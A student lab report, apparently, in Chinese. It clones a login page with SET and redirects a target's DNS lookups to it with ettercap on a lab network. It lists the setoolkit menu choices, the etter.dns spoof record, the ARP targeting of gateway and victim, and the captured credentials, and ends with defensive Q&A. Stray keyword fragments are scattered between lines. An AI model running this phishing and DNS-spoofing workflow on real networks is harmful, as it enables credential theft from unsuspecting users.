(1)簡單應用SET工具創建冒名網站 (1分)apache
(2)ettercap DNS spoof (1分)瀏覽器
(3)結合應用兩種技術,用DNS spoof引導特定訪問到冒名網站。(1.5分)緩存
sudo vi /etc/apache2/ports.conf netstat -tupln | grep 80 apachectl start setoolkit 選擇1,社會工程學攻擊 選擇2,釣魚網站攻擊向量 選擇3,登錄密碼截取攻擊 選擇2,網站克隆
使用靶機(win2008)瀏覽器輸入kali的IP:192.168.153.135
安全
kali端響應,收到用戶名和密碼數據:
服務器
ifconfig eth0 promisc vi /etc/ettercap/etter.dns
添加新紀錄後保存。即指定靶機經過DNS轉換的域名和服務器IP:
192.168.200.80/cas/login A 192.168.153.135
網絡
ettercap -G Sniff-->unified sniffing指定監聽的網卡 Hosts-->Scan for hosts掃描子網 Hosts-->Hosts list查看子網主機列表
將網關IP:192.168.153.2添加到Targert1,將靶機IP:192.168.153.1添加到Targert2:
工具
Plugins-->Manage the plugins-->雙擊dns_spoof網站
靶機經過ping設定的域名,查看是否欺騙成功
url
感想:網站克隆技術有好的方面也有壞的方面,很容易攻擊訪問者的電腦。因此之後遇到不安全的網站,儘可能不要點進去,頗有可能就鏈接到了一個釣魚網站被盜用了信息。code
(1)一般在什麼場景下容易受到DNS spoof攻擊
答:不設防的點擊連接時(例如朋友提供的,免費WIFI自動打開等)
(2)在平常生活工做中如何防範以上兩攻擊方法
答:不輕易打開非官方渠道得到的連接;不能隨便連wifi。